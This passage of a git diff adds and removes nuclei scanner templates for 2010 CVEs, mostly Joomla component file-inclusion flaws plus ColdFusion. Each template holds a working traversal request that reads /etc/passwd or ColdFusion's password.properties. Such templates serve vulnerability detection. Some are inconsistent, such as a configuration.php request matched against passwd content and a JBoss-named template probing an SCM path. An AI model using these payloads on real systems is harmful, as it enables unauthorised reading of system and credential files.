path: - - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1476.yaml b/nuclei-templates/CVE-2010/cve-2010-1476.yaml deleted file mode 100644 index c1718acac9..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1476.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1476 - -info: - name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12150 - - https://www.cvedetails.com/cve/CVE-2010-1476 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1478.yaml b/nuclei-templates/CVE-2010/cve-2010-1478.yaml new file mode 100644 index 0000000000..850f9aa938 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1478.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1478 + +info: + name: Joomla! Component Jfeedback 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12145 + - https://www.cvedetails.com/cve/CVE-2010-1478 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1491.yaml b/nuclei-templates/CVE-2010/cve-2010-1491.yaml deleted file mode 100644 index 865fd5f04f..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1491.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1491 - -info: - name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12318 - - https://www.cvedetails.com/cve/CVE-2010-1491 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1494.yaml b/nuclei-templates/CVE-2010/cve-2010-1494.yaml deleted file mode 100644 index 290ff32940..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1494.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1494 - -info: - name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12113 - - https://www.cvedetails.com/cve/CVE-2010-1494 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1533.yaml b/nuclei-templates/CVE-2010/cve-2010-1533.yaml deleted file mode 100644 index 03ef38a6ea..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1533.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1533 - -info: - name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12142 - - https://www.cvedetails.com/cve/CVE-2010-1533 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1535.yaml b/nuclei-templates/CVE-2010/cve-2010-1535.yaml new file mode 100644 index 0000000000..f4ad1e3c80 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1535.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1535 + +info: + name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12151 + - https://www.cvedetails.com/cve/CVE-2010-1535 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1658.yaml b/nuclei-templates/CVE-2010/cve-2010-1658.yaml new file mode 100644 index 0000000000..1996fbeb69 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1658.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1658 + +info: + name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12427 + - https://www.cvedetails.com/cve/CVE-2010-1658 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1718.yaml b/nuclei-templates/CVE-2010/cve-2010-1718.yaml deleted file mode 100644 index 5ebbc5844c..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1718.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1718 - -info: - name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12282 - - https://www.cvedetails.com/cve/CVE-2010-1718 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1719.yaml b/nuclei-templates/CVE-2010/cve-2010-1719.yaml deleted file mode 100644 index b41a153cae..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1719.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1719 - -info: - name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12233 - - https://www.cvedetails.com/cve/CVE-2010-1719 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1722.yaml b/nuclei-templates/CVE-2010/cve-2010-1722.yaml deleted file mode 100644 index 6290c4d973..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1722.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1722 - -info: - name: Joomla! Component Online Market 2.x - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12177 - - https://www.cvedetails.com/cve/CVE-2010-1722 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1871.yaml b/nuclei-templates/CVE-2010/cve-2010-1871.yaml new file mode 100644 index 0000000000..8f02fc1dd0 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1871.yaml @@ -0,0 +1,24 @@ +id: CVE-2010-1871 + +info: + name: JBoss Seam 2 Code Execution + author: medbsq + severity: high +# - https://www.cvebase.com/cve/2010/1871 +requests: + - method: GET + path: + - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and + matchers: + - type: word + words: + - "java.lang." + - "For input string: \"zie\"" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1875.yaml b/nuclei-templates/CVE-2010/cve-2010-1875.yaml new file mode 100644 index 0000000000..4db56ab46e --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1875.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1875 + +info: + name: Joomla! Component Property - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11851 + - https://www.cvedetails.com/cve/CVE-2010-1875 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1953.yaml b/nuclei-templates/CVE-2010/cve-2010-1953.yaml new file mode 100644 index 0000000000..106ad37fdc --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1953.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1953 + +info: + name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12288 + - https://www.cvedetails.com/cve/CVE-2010-1953 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1955.yaml b/nuclei-templates/CVE-2010/cve-2010-1955.yaml new file mode 100644 index 0000000000..932f7d5fe8 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1955.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1955 + +info: + name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12238 + - https://www.cvedetails.com/cve/CVE-2010-1955 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1979.yaml b/nuclei-templates/CVE-2010/cve-2010-1979.yaml deleted file mode 100644 index 00cab2ad0f..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1979.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1979 - -info: - name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12088 - - https://www.cvedetails.com/cve/CVE-2010-1979 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1980.yaml b/nuclei-templates/CVE-2010/cve-2010-1980.yaml new file mode 100644 index 0000000000..37219a9e71 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1980.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1980 + +info: + name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12085 + - https://www.cvedetails.com/cve/CVE-2010-1980 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1981.yaml b/nuclei-templates/CVE-2010/cve-2010-1981.yaml deleted file mode 100644 index bb141c636c..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1981.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1981 - -info: - name: Joomla! Component Fabrik 2.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12087 - - https://www.cvedetails.com/cve/CVE-2010-1981 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1983.yaml b/nuclei-templates/CVE-2010/cve-2010-1983.yaml new file mode 100644 index 0000000000..2c169b3f5c --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1983.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1983 + +info: + name: Joomla! Component redTWITTER 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php + reference: + - https://www.exploit-db.com/exploits/12055 + - https://www.cvedetails.com/cve/CVE-2010-1983 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/cve-2010-2033.yaml deleted file mode 100644 index 19eba6d68b..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2033.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2033 - -info: - name: Joomla Percha Categories Tree 0.6 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html - - https://www.cvedetails.com/cve/CVE-2010-2033 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2037.yaml b/nuclei-templates/CVE-2010/cve-2010-2037.yaml new file mode 100644 index 0000000000..e3db0ee030 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2037.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2037 + +info: + name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34005 + - https://www.cvedetails.com/cve/CVE-2010-2037 + tags: cve,cve2010,lfi,joomla + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2045.yaml b/nuclei-templates/CVE-2010/cve-2010-2045.yaml new file mode 100644 index 0000000000..b40cfaab94 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2045.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2045 + +info: + name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12595 + - https://www.cvedetails.com/cve/CVE-2010-2045 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2050.yaml b/nuclei-templates/CVE-2010/cve-2010-2050.yaml new file mode 100644 index 0000000000..9aedcbfc20 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2050.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2050 + +info: + name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12611 + - https://www.cvedetails.com/cve/CVE-2010-2050 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2128.yaml b/nuclei-templates/CVE-2010/cve-2010-2128.yaml deleted file mode 100644 index cf019f95a3..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2128.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2128 - -info: - name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. - reference: | - - https://www.exploit-db.com/exploits/12607 - - https://www.cvedetails.com/cve/CVE-2010-2128 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2259.yaml b/nuclei-templates/CVE-2010/cve-2010-2259.yaml deleted file mode 100644 index 0d38e58882..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2259.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2259 - -info: - name: Joomla! Component com_bfsurvey - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2507.yaml b/nuclei-templates/CVE-2010/cve-2010-2507.yaml deleted file mode 100644 index 4ff7972b09..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2507.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2507 - -info: - name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | - - https://www.exploit-db.com/exploits/13981 - - https://www.cvedetails.com/cve/CVE-2010-2507 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2680.yaml b/nuclei-templates/CVE-2010/cve-2010-2680.yaml deleted file mode 100644 index fa1dc916da..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2680.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2680 - -info: - name: Joomla! Component jesectionfinder - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/14064 - - https://www.cvedetails.com/cve/CVE-2010-2680 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2682.yaml b/nuclei-templates/CVE-2010/cve-2010-2682.yaml new file mode 100644 index 0000000000..180ce24bb8 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2682.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2682 + +info: + name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14017 + - https://www.cvedetails.com/cve/CVE-2010-2682 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2857.yaml b/nuclei-templates/CVE-2010/cve-2010-2857.yaml deleted file mode 100644 index 1478adabab..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2857.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2857 - -info: - name: Joomla! Component Music Manager - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. - reference: | - - https://www.exploit-db.com/exploits/14274 - - https://www.cvedetails.com/cve/CVE-2010-2857 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2861.yaml b/nuclei-templates/CVE-2010/cve-2010-2861.yaml deleted file mode 100644 index 58f43f1fad..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2861.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-2861 - -info: - name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI - author: pikpikcu - severity: high - description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. - reference: - - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - - http://www.adobe.com/support/security/bulletins/apsb10-18.html - tags: cve,cve2010,coldfusion,lfi,adobe - -requests: - - method: GET - path: - - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en" - - matchers-condition: and - matchers: - - - type: word - words: - - "rdspassword=" - - "encrypted=" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-3203.yaml b/nuclei-templates/CVE-2010/cve-2010-3203.yaml deleted file mode 100644 index 7f5245195e..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-3203.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-3203 - -info: - name: Joomla! Component PicSell 1.0 - Local File Disclosure - author: daffainfo - severity: high - description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. - reference: | - - https://www.exploit-db.com/exploits/14845 - - https://www.cvedetails.com/cve/CVE-2010-3203 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-3426.yaml b/nuclei-templates/CVE-2010/cve-2010-3426.yaml deleted file mode 100644 index 9eece26cbd..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-3426.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-3426 - -info: - name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/14964 - - https://www.cvedetails.com/cve/CVE-2010-3426 